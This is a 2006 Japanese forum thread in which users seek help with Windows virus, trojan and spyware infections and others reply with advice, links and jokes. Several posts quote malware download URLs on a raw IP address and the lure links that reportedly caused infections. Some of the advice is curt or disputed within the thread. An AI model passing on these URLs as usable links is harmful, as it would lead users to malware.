【症状を具体的に、分かる限りすべて書く】
定期的に
tp://85.255.115.187/users/fill/web/images/rzspy.exe
tp://85.255.115.187/users/fill/web/images/idownload.exe
にアクセスし、その度にAvast!が
「ウイルスが発見されました。ダウンロードを遮断します」
と警告してくる

ファイル名:tp://85.255.115.187/users/fill/web/images/rzspy.exe
マルウェアの名・タイプ:Win32:Trojan-gen. {Other} ウイルス/ワーム

ファイル名:tp://85.255.115.187/users/fill/web/images/idownload.exe
マルウェアの名・タイプ:Win32:Small-TG [Trj] トロイの木馬

【何をしたらそんなことになったのか】ニューススレに張られていた以下のURLをクリックしました
tp://www.google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=

【これまでにとった措置】 AvastでHDDスキャン、Spybot・Ad-awareでスキャン・駆除
             トレンドマイクロ・オンラインスキャンでHDDスキャン
【その他の質問】 特になし

610 :名無しさん@お腹いっぱい。:2006/07/02(日) 19:55:42
友人がウイルスに感染してしまったみたいでavastのことを教え、スキャンさせています
とりあえずavastの最初のwindows起動前?のスキャンをしていますが
c\windowsはdeleteは避けできるだけリペアし、無理なら取り合えず無視して
windows起動後もう一度スキャンしてみようと伝えましたが
そのリペアできないファイルの中に
C:\WINDOWS\inet20026\killer.exe.bak みたいなファイルがあったそうです
検索しても英語ばっかりなんですがこれはウイルスで間違いないのでしょうか?

あとc/program/commonfilesのファイルを何個か消してしまったみたいですが
これについても問題はないのでしょうか?

611 :名無しさん@お腹いっぱい。:2006/07/02(日) 19:59:37
ちなみにwinxp,ウイルス対策ソフトなし
ウインドウズアップデートもしてるかどうか不明です。

612 :名無しさん@お腹いっぱい。:2006/07/02(日) 20:37:24
>>609-611
リカバリ

613 :名無しさん@お腹いっぱい。:2006/07/02(日) 20:53:06
2台PCを持っていてどぅちもウィルス対策とか入れてないんですけど
片方HDDの寿命かウィルスか何かわからない原因で逝ったので(セーフモードでも起動しない)
とりあえず今のメインPCにウィルス対策導入しようと思うんですけど
ウィルスの知識が全く無いので、まずはオンラインスキャンしてみたところ
4つのファイルが感染してました。CドライブのWINなんたらってとこだったかな
オンラインスキャンじゃ削除できないようだしこれからのことも考えてノートンかなんかに課金しようと思うんですけど
ウィルス対策って1つにお金払えば複数のPCに同時に使えますか?

614 :名無しさん@お腹いっぱい。:2006/07/02(日) 21:13:06
入れる数だけ買え。

615 :名無しさん@お腹いっぱい。:2006/07/02(日) 21:20:34
名目上はどのアンチウイルスも1台までだったと思うが
どうせ1つは買うんだし、使えるかどうか自分で試してみたらどうかと

616 :名無しさん@お腹いっぱい。:2006/07/02(日) 21:42:32
>>613
615やる前にしっかり貯金をしておくんだぞ。

617 :613:2006/07/02(日) 21:55:09
ウィルスソフトの知識も無いけどもちろんPCの知識もそれほど無いのですが
ウィルス対策って結構お金かかるんですか?
よくサイトとか見てもお金ためとけって書いてあるんで。
ソフトにもよると思うけどちゃんとしたセキュリティソフト継続するためには
だいたい月どれくらい喰われるんでしょうか。

618 :名無しさん@お腹いっぱい。:2006/07/02(日) 22:26:02
大抵のウィルス対策ソフトは年契約
月いくらとかみみっちぃこと言うならフリーソフトでも使ってろ

619 :名無しさん@お腹いっぱい。:2006/07/02(日) 22:31:32
【使用OS】Windows XP
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】Norton Internet Security 2004
【ちゃんとUpdateしてるか】2月まではしてました…
【スキャンした結果(ウイルス名・発見場所)】 ウィルスが検出されてからすぐに
Norton Internet Security 2006(体験版)をダウンロードしてスキャンしましたが検出されず
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】ブラウザのトップページがかえられようとしましたが、
それを阻止しましたというNorton 2006の通知。
【何をしたらそんなことになったのか】 2ちゃんで橋本元首相死去についてのスレを見ていたら、
急にウィルスが検出されましたとのNorton 2004の通知があり、このウィルスは修復できませんという表示がでました。
そのスレの中のレスに何かのテキストがありました。
【これまでにとった措置】 Norton2004でウィルスが検出されましたと表示されてから、
すぐにNorton2006体験版をダウンロードしウィルス定義を最新のものにし、システムの完全スキャンを行いました。
【その他の質問】 ウィルスについてまったくの無知です。。
感染したかどうかわからないのですが、どの様に対処をしたらよいのか全然わかりません。
自分なりに調べてノートントラップなのかなと思いましたがトップページがかえられようとしたので…
危険なウイルスなのでしょうか…?

よろしくお願い致します


620 :名無しさん@お腹いっぱい。:2006/07/02(日) 22:57:35
「阻止しました」と書いてあるが・・・

621 :名無しさん@お腹いっぱい。:2006/07/02(日) 23:18:03
>>609
親玉がいるんですよ。親玉が。

他の人にも言えることだけど、フリーでも
Avast!だけでなく、AntiVirとかAVGとかClamWinとか
他のものも使ってみたらどう?
違うウィルスだけど、AntiVir→ClamWinとやって解決したことあります。

622 :名無しさん@お腹いっぱい。:2006/07/02(日) 23:34:38
whenuというスパイウェアに感染したのですがどのように対処したらよろしいですか?

623 :名無しさん@お腹いっぱい。:2006/07/03(月) 04:07:52
>>622
リカバリ

624 :名無しさん@お腹いっぱい。:2006/07/03(月) 10:21:36
シマンテックのオンラインチェックでxzxzxzxzxzxz.exeを検出しました。
キングソフトのインターネットセキュリティ2006だとスルーするのですが、大丈夫でしょうか?

Nortonを導入すればいいのだろうけど、できることなら手動削除したいので
どなたか、ご教授のほど宜しくお願いします。


625 :名無しさん@お腹いっぱい。:2006/07/03(月) 12:48:20
xzxzxzxzxzxz.exe の検索結果 約 96 件中 1 - 10 件目 (0.81 秒)

626 :名無しさん@お腹いっぱい。:2006/07/03(月) 21:03:05
インターネットセキュリティ2006が体験版ならアンスコしてメジャーな所の体験版インスコ

627 :名無しさん@お腹いっぱい。:2006/07/04(火) 09:45:24
age

628 :俺メモ@306 308:2006/07/04(火) 11:02:54
昨日になって>306の状況が再現された
今日になったら異常無くなった
むりやり法則を考えると月初めの第一月曜日か?
            来月まで気にしてみるか

629 :名無しさん@お腹いっぱい。:2006/07/04(火) 11:05:15
>>625 >>626
ありがとうございました。
調べたらBitDefenderのHPにそれらしきウィルスが掲載されていました。

感染成立時に投下されるexeファイルは発見できませんでしたが、
レジストリにxzxzxzxzxzxz.exeがエントリされてましたので、これを削除
その後インターネットセキュリティ2006をアンスコしてBitDefender(フリー版)を
導入して、チェックしましたがクリーンでした。

こんなのでいいのかなあ・・・orz








630 :名無しさん@お腹いっぱい。:2006/07/04(火) 22:00:10
>>629
Bitなんたらをググった
おう、とりあえずセーフだな、ソフト的には

後は使いこなすことが大事
乗り換えるのも自由だが偽ソフトをつかまないようにな

631 :名無しさん@お腹いっぱい。:2006/07/05(水) 14:41:02
>>629
ちょっと待てBitDefenderのフリーは常駐監視しないぞ

632 :名無しさん@お腹いっぱい。:2006/07/05(水) 17:10:05
       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」 
  |]ムヽ、_    __∠二、__,ィ|/ ィ }
  |    ̄`ミl==r'´     / |lぅ lj   私が原田ウィルス作者ですが何か?
  「!ヽ、_×___j ヽ、×  -'  レ'r'/  
   `!     j  ヽ        j_ノ   
   ',    ヽァ_ '┘     ,i    
    ヽ  ___'...__   i   ハ__      
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

633 :名無しさん@お腹いっぱい。:2006/07/05(水) 17:35:32
質問なのですが、2ちゃんねるで自分が書き込んだ覚えのない書込みが、
自分の書込みのIDと完全一致していたのですが、これって普通に起こりうる現象なのでしょうか?
誰かに意図的に、例えばパソコンに侵入されてどうかされたのではないかと感じているのですがどうなのでしょう。
ちなみに私の書込みは携帯からです、
ですので間違って誰かがその携帯から書き込んだということだけは絶対にないと断言できるだけに不安です。
なぜIDになってしまったのでしょう?

634 :名無しさん@お腹いっぱい。:2006/07/05(水) 17:49:19
半年に一回くらいはある

635 :名無しさん@お腹いっぱい。:2006/07/05(水) 18:18:50
C:\WINDOWS\system32\TFTP1632 は W32.Spybot.Worm に感染しています。
C:\WINDOWS\system32\TFTP696 は W32.Spybot.Worm に感染しています。
C:\WINDOWS\system32\TFTP792 は Bloodhound.Morphine に感染しています。

このような結果が出ました。シマンテックのスキャン機能です。
これはどうしたらよろしいでしょうか??非常に困っています。
ファイル削除でもよろしいのでしょうか?
ちなみにウィルスバスタースキャンでもウィルス反応がありました。
どのたかお願いいたします。

636 :名無しさん@お腹いっぱい。:2006/07/05(水) 19:16:44
OS再インスコ

637 :名無しさん@お腹いっぱい。:2006/07/05(水) 19:56:36
>>634
同じスレで同じ日に書き込まれたものなのですが偶然でしょうか?
意図的にすることは可能なのですか?

638 :名無しさん@お腹いっぱい。:2006/07/05(水) 20:33:06
同じマンションの人で、心当たりはないかな?

639 :名無しさん@お腹いっぱい。:2006/07/06(木) 01:53:56
【使用OS】 Windows XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 NAV
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 反応なし
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】
急にregscan.exeが起動し、ネットにアクセスしたのでノートン先生が怒った
ぐぐったらBackdoor.Talexとかいうのが出てきたのでウィルスかなと思うのですがNAVは反応しませんでした。
ちなみにregscan.exeは更新日時が2002年となっていました。(PC買ったのが2004年なのですが)
このregscan.exeは消してもいいものなんでしょうか?
>>572も同じような症状のようですね
【何をしたらそんなことになったのか】 特に何もしてないはず。動画見てるときに勝手に動いた。
【これまでにとった措置】 なし
【その他の質問】


640 :名無しさん@お腹いっぱい。:2006/07/06(木) 15:51:45
【使用OS】windows98
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】VB2004
【ちゃんとUpdateしてるか】していない
【スキャンした結果(ウイルス名・発見場所)】なし
【別のオンラインスキャンしたならその結果は】symantecオンラインスキャン
結果:2ch datファイルに反応あり
【症状を具体的に、分かる限りすべて書く】
VBがWORM_SQLP1434.Aを検出、不正アクセスをブロック
【何をしたらそんなことになったのか】2ch運営臨時情報のリンクを開いた
【これまでにとった措置】
スキャンで出たdatファイルを削除
WORM_SQLP1434.Aをぐぐり出て来た結果のシステムクリーナを実行
アドウェアSEpro実行
そのごオンラインスキャン実行、結果感染ファイル無し
【その他の質問】
感染ファイルを削除、スキャン結果0にも関わらず
VBが反応を続けています。どうしたらいいのでしょうか

641 :名無しさん@お腹いっぱい。:2006/07/06(木) 16:32:14
( ゜σ・・ ゜) ホジホジ

642 :名無しさん@お腹いっぱい。:2006/07/06(木) 20:07:22
>>639
Backdoor.Talexバックドアトロイの木馬は感染先コンピュータへ完全にアクセスできるようにします。トロイの木馬はDelphiプログラミング言語で書かれており、ASPackで圧縮されています。
http://www.symantec.com/region/jp/avcenter/venc/data/backdoor.talex.html

643 :名無しさん@お腹いっぱい。:2006/07/06(木) 21:51:29
OS=WinMX
ウイルス名=Virus
どうしたらいいのか教えろ

644 :名無しさん@お腹いっぱい。:2006/07/06(木) 23:52:50
>>643
PC買い替えろ

645 :639:2006/07/07(金) 00:35:44
>>642
ありがとうございます
でもウイルス定義最新版にしても検出されないし
レジストリキー見てもないんですがやっぱりウイルスじゃないんでしょうか?
ちなみにregscan.exeはC:\WINDOWS\system32にありました
これだけでも消した方がいいんでしょうか?それとも誰にでも入ってるもんなんでしょうか?

646 :名無しさん@お腹いっぱい。:2006/07/08(土) 01:20:09
【使用OS】 WindowsXP SP2
【WindowsUpdateしてるか】 自動更新のみ
【AntiVirusは何を使っているか】 NIS2005
【ちゃんとUpdateしてるか】 自動更新のみ
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】 トレンドマイクロでスキャン、ウイルス無し
【症状を具体的に、分かる限りすべて書く】
NIS2005の常駐が突然終了してしまう。気が付くとタスクバーからNIS2005のアイコンが消えてたり、
異常終了してエラーを報告する窓が出る時もある。常駐が終了すると、ブラウザは普通に使えるけど
メールは送受信できなくなる。再度NIS2005を起動すると常駐しますが、また強制終了される時がある。
再現性が全く分からないけど、メールを受信中に異常終了になりやすい?
あと、CCAPP.EXEが異常に負荷がかかる時があって、スキャン中やメール送受信中なら分かるけど
何もしていない状態でCPU負荷が50%(HT有効)もっていかれる。こうなると他の処理も重たくなり、
再起動orログオフしないと元に戻らない。再現性は全く不明。CPU温度の異常で気付く。
【何をしたらそんなことになったのか】
特に思い当たる事はありません。変なexeは実行してないし、知らない人からのメールは即削除してます。
【これまでにとった措置】 無し

647 :名無しさん@お腹いっぱい。:2006/07/08(土) 15:44:12
       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」 
  |]ムヽ、_    __∠二、__,ィ|/ ィ }
  |    ̄`ミl==r'´     / |lぅ lj   私が原田ウィルス作者ですが何か?
  「!ヽ、_♂___j ヽ、♂  -'  レ'r'/  
   `!     j  ヽ        j_ノ   
   ',    ヽァ_ '┘     ,i    
    ヽ  ___'...__   i   ハ__      
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

648 :名無しさん@お腹いっぱい。:2006/07/08(土) 18:20:30
原田さん 剥けてる?

649 :572:2006/07/09(日) 00:15:38
>>639
XPには元々無いからregscan.exeは削除
レジストリのRunからも削除
○○.Talex・・がTempIFに2個あったからそれを削除

650 :名無しさん@お腹いっぱい。:2006/07/09(日) 09:23:29
>>649
ありがとうございます
やってみます

651 :名無しさん@お腹いっぱい。:2006/07/09(日) 22:48:03
       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」 
  |]ムヽ、_    __∠二、__,ィ|/ ィ }
  |    ̄`ミl==r'´     / |lぅ lj   私が原田ウィルス作者ですが何か?
  「!ヽ、_♂___j ヽ、♂  -'  レ'r'/  
   `!     j  ヽ        j_ノ   
   ',    ヽァ_ '┘     ,i    
    ヽ  ___'...__   i   ハ__      
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

652 :名無しさん@お腹いっぱい。:2006/07/09(日) 23:09:39
ど素人なんですが、教えてください

あるホームページをみただけで
ウイルスに感染することって、あるのですか?

ダウンロードとかしなければ大丈夫ですか?


653 :名無しさん@お腹いっぱい。:2006/07/09(日) 23:23:03
ttp://namako.oops.jp/index.php?mode=comment&date=2006.07.09

これって何なんでしょうか・・・・・

654 :名無しさん@お腹いっぱい。:2006/07/09(日) 23:36:39
>>652
>あるホームページをみただけで
>ウイルスに感染することって、あるのですか?
条件さえ満たせば有り得る。古いが Redlof なんかその代表だったウイルス。

さらにネットに接続しているだけで感染するウイルスもある。
有名な MSBlaster などはその代表だった。

655 :名無しさん@お腹いっぱい。:2006/07/09(日) 23:50:46
>654
どうもです

とあるホームページをみたら、いきなりウイルスを
感知しましたというメッセージがでたんです
うろ覚えなんですが・・

それでどうしたものかと思ってたんです
やばいですか?


656 :名無しさん@お腹いっぱい。:2006/07/10(月) 01:12:27
やばすぎ

657 :名無しさん@お腹いっぱい。:2006/07/10(月) 09:09:38
過去レスを全く見ないうえに情報も小出しにして質問とかはヤバイな

658 :名無しさん@お腹いっぱい。:2006/07/10(月) 11:51:53
>>565
ウィルス削除すればいいジャマイカ

659 :名無しさん@お腹いっぱい。:2006/07/10(月) 15:54:11
ど素人から質問です。
ウィルスにかかったみたいなんですが、対処方がわかりません。症状は、インターネットが開けず、デスクトップにあるアイコンも開けない開けない状態。マイコンピューターは開けました。今スキャン中です。
ウィルスのたぶん元凶のファイルを消そうとしても、デスクトップにあるので、どうにもできません。
何か対処方を教えてください

660 :名無しさん@お腹いっぱい。:2006/07/10(月) 16:20:18
>>659
http://www.trendmicro.co.jp/hcall/index.asp
http://www.symantec.com/region/jp/securitycheck/index.html

661 :名無しさん@お腹いっぱい。:2006/07/10(月) 19:42:32
インターネットが開けないから見れないんですが。

662 :名無しさん@お腹いっぱい。:2006/07/10(月) 20:58:56
君はこのスレをどうやって見てるのさ?

663 :名無しさん@お腹いっぱい。:2006/07/10(月) 22:14:24
携帯です。

664 :名無しさん@お腹いっぱい。:2006/07/11(火) 11:56:03
age

665 :名無しさん@お腹いっぱい。:2006/07/11(火) 13:31:38
659です。
もう少し詳しく書きます。

エロゲをしていたら、突然PCが落ちる。

起動しようとしても通常起動では繋がらないので、セーフモードで起動。

起動したもののインターネットの接続が出来ず。

さらに、デスクトップのアイコンがクリック出来ず。

WMPを起動しようとしたらエラー。

スキャンした結果、Unix.Penguinだと発覚。

対処方わからず。
危険性は低いようですが、早くなおしたいです。
今こんな感じです。
対処方を教えてください。

666 :名無しさん@お腹いっぱい。:2006/07/11(火) 14:51:03
ところで、おまいさんのOSは秘密かね?



 お約束の   ダミヤーーーン

667 :名無しさん@お腹いっぱい。:2006/07/11(火) 16:40:24
今まで対策してなかったマシンの対策を依頼されてZAとAVASTを導入しました。
AVASTで25個ほど削除しても残りがあったのでシマンテックのネット検索で16個発見し
すべて削除しました。

しかし、ゴミ箱からすべて削除してもmIRCと言うソフトが走ってしまいます。
検索するとmIRC.exeと言うファイルがc:\windows\system32にあり、これを削除しても
次にリブートするとまたどっかからかmIRC.exeを再育成しているらしく起動してしまいます。

もちろんスタートアップやレジストリの2ヶ所のwindows\runの中もチェックしましたが
mIRC.exeを実行しているものは見つかりません。

これって何なのでしょうか?
ぐぐるとチャットツールみたいなのでたぶん裏でキーロガーとして走らせていると思うのですが、
対処法が分からないので。
またこれを削除する方法がありましたら教えてください。

OS:XP Homeです。
#avastの検出率が悪くてちょとビクーリ

668 :名無しさん@お腹いっぱい。:2006/07/11(火) 16:57:35
自分のメールアドレスを兄貴に教えたらどこかに書き込んだのか、スパムメールが大量にくるようになりました。
メールが来るたびに受信拒否アドレスに追加していってるのですが、
受信拒否しても恐ろしいことにメールアドレスが違うところからどんどん来て今130件くらいになっています。
200件くらいまでしか登録できません。どうしたらいいでしょうか?
このメールアドレスはもう捨てなければならないでしょうか?

669 :名無しさん@お腹いっぱい。:2006/07/11(火) 19:44:36
>>667
レジストリの中ファイル名で探せば自動起動のエントリは見つかるかもしれんが
それを復活させてるのを探さにゃならんし
俺ならOS再インストールから始めるね

670 :名無しさん@お腹いっぱい。:2006/07/11(火) 22:40:53
>>667
トロイの元ネタはtempファイルにあって見つからないこと多いよ
IEtemp一旦全部消してみるとか

671 : ◆N9P3SuvBPo :2006/07/11(火) 23:08:47
>667
RunServicesというオチだったりしてな。
Hijackthisっていうツールを使ってみるのも手だし。

672 :名無しさん@お腹いっぱい。:2006/07/11(火) 23:54:00
>>668
兄じゃを捨てなされ

673 :あ〜:2006/07/12(水) 00:09:58
WORM_GAOBOT.DFというウイルスにやられました。
削除しようとしても現在使用中で削除できません。
タスクマネからプロセスをみてもみつからないんですけど・・・
削除の方法お願いします。

674 :名無しさん@お腹いっぱい。:2006/07/12(水) 00:55:29
ggr

675 :665:2006/07/12(水) 02:40:48
OSはXPです。

676 :名無しさん@お腹いっぱい。:2006/07/12(水) 05:21:04
omoplj.exeってのが勝手にメール送りまくってるぽいんだけど何か分かります?
プロセスの終了で止められたから今は大丈夫なんですが・・・

677 :名無しさん@お腹いっぱい。:2006/07/12(水) 06:53:43
質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

678 :名無しさん@お腹いっぱい。:2006/07/12(水) 10:18:37
>>667です。みんなレスありがとう
system32を一つずつチェックしてとりあえずgh0st.exeは見つけて消しました。
gh0st[0].cplとかを大量に作成してました。

>>669
それがOSの削除が出来ないマシンでして。ちょと困ってます。
今は無きOASYSのソフトを使っていてメーカーも無いソフトがあるので。
OSの修復セットアップは出来るのですが。。。

>>670
やったけど変わらないです。

>>671
Hijackthis使ってみます。
サービスもチェックしたんですけど無いんですよね。
M$以外ではCisco systemってのが走ってますけどこれは中身が不明。
とりあえずこいつはZAでネットにはつなげないようにしてます。


あと、どなたか教えて欲しいのですけど、ウィルスで変更されたレジストリを
元に修復するツールみたいなのって無いでしょうか?
WindowsUpdateをかけるとある程度直るみたいなんだけど、まだ激遅なので。

679 :668:2006/07/12(水) 10:41:07
>>672
兄貴を削除しました。www

680 :名無しさん@お腹いっぱい。:2006/07/12(水) 13:35:32
メール受信しただけでパソコンがういるすに感染するってほんと?

681 :名無しさん@お腹いっぱい。:2006/07/12(水) 16:52:17
>>680
場合によってはほんと

682 :名無しさん@お腹いっぱい。:2006/07/12(水) 16:59:19
2ちゃんねるのスレを観覧しただけでウィルスに感染した!!!
ひどい・・・うわぁー!
最悪

683 :名無しさん@お腹いっぱい。:2006/07/12(水) 18:16:40
>>680
受信しただけではウイルスにはかからないのでは?
添え付けファイルを開くとか書かれてるURLにいって何かをDLしたりするとかかるかもしれないけど。

684 :名無しさん@お腹いっぱい。:2006/07/12(水) 21:30:52
昔々なら受信したメールをクリックしたら
プレビューされて発動なんてのもあったけどな

685 :名無しさん@お腹いっぱい。:2006/07/12(水) 21:38:21
htmlメール
世にはWinupdateをしてないOutlookユーザーが一杯居るお

686 :名無しさん@お腹いっぱい。:2006/07/12(水) 22:53:17
亀レス
>>221 についてなんだが、同じ現象に陥っていた。
テンプレの内容はほぼ同じでノートンの更新を最近行ったくらいなので、結果報告だけということもあり省略。

msconfig のスタートアップタグに無名項目があったのでチェックをはずす。
場所の項目のみが指定されていて「SOFTWEAR\Microsoft\Windows\Current\VersionRun」だった。
何かマジでウィルスくさい。
リカバリかけた方がよさげ?

ちなみに効果音とは「ヨ〜〜、ポン」を崩した感じだった。
「フィ〜〜ン、プニョン」の方が似てるかも。

とりあえず、情報の共有ということで。

687 :名無しさん@お腹いっぱい。:2006/07/13(木) 10:18:37
>>678です。

その後、Niftyのウィルス検索サービスで検索してみたらトロイが51個も見つかりました。
何気にトロイ検出と修正に関してはNifty最強かもしれません。

誰かレジストリのチェックや修復できるソフトを知っていたら教えてください。


688 :名無しさん@お腹いっぱい。:2006/07/13(木) 10:29:42
>>682
本当にここは酷いインターネッツですね

689 :名無しさん@お腹いっぱい。:2006/07/13(木) 10:53:14
>>687
お願いがあります→ネットに接続しないでください

690 :名無しさん@お腹いっぱい。:2006/07/13(木) 11:19:44
>>687
Regseeker
http://pc8.2ch.net/test/read.cgi/win/1140605061/

691 :名無しさん@お腹いっぱい。:2006/07/13(木) 11:41:28
>>690
よりによって一番最悪なのを紹介するなよ。
それにその手のは削除だけで修正はしないぞ。

692 :名無しさん@お腹いっぱい。:2006/07/13(木) 11:45:39
レジストリのチェックつーのはまともな状態の時から監視しとかないと意味無いような

693 :名無しさん@お腹いっぱい。:2006/07/13(木) 19:53:24
tp://www.softpedia.com/public/cat/13/9/13-9-195.shtml
ここへ行ったら、怪しげなダイアログが出てきました。

694 :名無しさん@お腹いっぱい。:2006/07/13(木) 22:52:22
そうですか。よかったですね

695 :名無しさん@お腹いっぱい。:2006/07/14(金) 01:01:12
AVGを使っていて、スキャンしたところ、Win32/PEPatchというウィルスに感染していることがわかりました。
調べてみたんですけど、情報が少なくよくわからないのですが、正式名称はなんでしょうか?


696 :名無しさん@お腹いっぱい。:2006/07/14(金) 01:36:14
>>693
スパイウェアかなんかじゃない?

697 :名無しさん@お腹いっぱい。:2006/07/14(金) 03:44:16
さきほどネットを巡回していたところウィルスにかかったようです
早急に対処しないと情報をどこかへ送信されると出ています
一体どうすればいいのでしょうか?orz

698 :名無しさん@お腹いっぱい。:2006/07/14(金) 05:31:59
>>697
どこに出てんの?
いんちきスパイウェア駆除ソフトの宣伝の可能性も。

699 :名無しさん@お腹いっぱい。:2006/07/14(金) 13:07:40
WORM_SDBOT.PHってどんなウィルス?

700 :名無しさん@お腹いっぱい。:2006/07/14(金) 13:50:10
>>699
WORM_SDBOT.PH の検索結果 約 956 件中 1 - 10 件目 (0.40 秒)

701 :名無しさん@お腹いっぱい。:2006/07/14(金) 16:24:18
>>700
日本語ページがない。
日本じゃ珍しいウィルスなのか……

702 :名無しさん@お腹いっぱい。:2006/07/14(金) 19:50:28
ほんの少し日本語化
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM%5FSDBOT%2EPH

703 :名無しさん@お腹いっぱい。:2006/07/14(金) 20:48:34
TROJ_Genericがsystem32の中にあるファイルに感染してるんですけど削除できないんです。
TROJ_Genericって危険なウイルス?
ググったらトロイの木馬型って書いてあったんだけど。
どうすれば削除できるんだ・・・・・・(´・ω・`)

704 :名無しさん@お腹いっぱい。:2006/07/14(金) 20:58:19
>>703
まずは>>677の項目を埋めておくれ(´・ω・`)

705 :β ◆aelgVCJ1hU :2006/07/16(日) 18:44:51
すいません最近、
YAHOOの検索でサイトに飛ぼうとするとエラーページに飛んだり、
外国のサイトに飛んだりします。
さらにネットだけでなく、パソコンのデスクトップ画面が表示されてからの表示が遅い…
(今日はフリーズまがいだったので10回ぐらい再起動しました)
どうしたらいいですかね。。

706 :名無しさん@お腹いっぱい。:2006/07/16(日) 19:13:35
>>705
http://www.microsoft.com/downloads/details.aspx?FamilyID=435bfce7-da2b-4a6a-afa4-f7f14e605a0d&DisplayLang=ja
http://www.microsoft.com/downloads/details.aspx?FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356&DisplayLang=ja
http://www.symantec.com/region/jp/securitycheck/

707 :名無しさん@お腹いっぱい。:2006/07/17(月) 04:15:13
お尋ねしても宜しいでしょうか。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。
【スキャンした結果(ウイルス名・発見場所)】 発見できない。
【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出
【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。
【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。
セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは
情報の流出を防ぐ事ができないと言われた。
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。

708 :名無しさん@お腹いっぱい。:2006/07/17(月) 05:00:10
>>707
参考に
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=2080826

709 :名無しさん@お腹いっぱい。:2006/07/17(月) 06:49:35
このコピペ久しぶりだな

710 :名無しさん@お腹いっぱい。:2006/07/17(月) 06:55:13
ウィルスバスターの期限が終了しほったらかしにしてたらパソコンを立ち上げると「mIRC」ってアプリが自動に立ち上がるようになりました?
これは何かのウィルスですか?詳しい人教えて下さいm(__)m今は最新版のバスターを導入済みです

711 :名無しさん@お腹いっぱい。:2006/07/17(月) 11:38:42
>>710
ウイルスバスターを最新にアップデートして全ドライブをフルスキャン
それで駄目ならSymantecのオンラインスキャンでもやってみれ

712 :名無しさん@お腹いっぱい。:2006/07/17(月) 20:34:53
http://news20.2ch.net/test/read.cgi/news/1153132923/6
踏んだんですが、どうすればよいでしょうか??
今はオンラインスキャンしてます。

713 :名無しさん@お腹いっぱい。:2006/07/17(月) 21:25:50
>>712
           |
          ↑_|
         r__ノヽ     l⌒l
          .|\  \_  | .|
           | \∩/  \|  | 釣られるクマー
           /  ( ~●~ )  ヽ /
       r'"|u ●    ● |ノ
     ___.| | / u   \ | 
    (__ノ ヽ_____ノ 
         | U     / U  
   | | |   |      /    | |
   ‖‖  .|      (    ‖
          /  /ヽ  \
        ./  /   \  \
        .(_/     \_)

       | |      | |
       ‖       ‖


714 :名無しさん@お腹いっぱい。:2006/07/18(火) 00:13:32
tp://up.nm78.com/data/up093116.jpg

↑これウイルスですか??

715 :名無しさん@お腹いっぱい。:2006/07/18(火) 01:35:31
ttp://sylphys.ddo.jp/upld2nd/pc2/src/1153153639218.jpg

XP pro sp1のタスクリストなんですけど、何か変じゃないですか?
アイドルプロセス以外のユーザー名が全部空欄なんですよ。
コンピューター名やスタートメニューの○○のログオフにはちゃんと自分のユーザー名出てます。

KV、ウイルスバスターオンラインスキャン、シマンテックオンラインスキャンでは異常なしでした。


716 :715:2006/07/18(火) 01:39:47
スレ間違えました。

717 :名無しさん@お腹いっぱい。:2006/07/18(火) 02:01:17
たまにパソコンを起動したまま寝てると「ドゥドン」っていうよくUSBフラッシュメモリとかを本体から抜く音が聞こえます。パソコンをいじってないのにその音が聞こえると奇妙に感じるのですがこれってウイルスとかですか?ちなみにウイルススキャンしても何も出てきません。

718 :名無しさん@お腹いっぱい。:2006/07/18(火) 02:01:21
カチッ、カチッとファイルを開いてもないのにその音が鳴ります
全く操作してなくても不定期に鳴るのです

なんかハッカーが自分のファイルを盗み見ているようで不気味です
これはウイルスでしょうか?
ウイルスソフトには反応は無いです

719 :名無しさん@お腹いっぱい。:2006/07/18(火) 02:10:02
>>718
ttp://oreteki.org//media/img_20060614T114051764.JPG
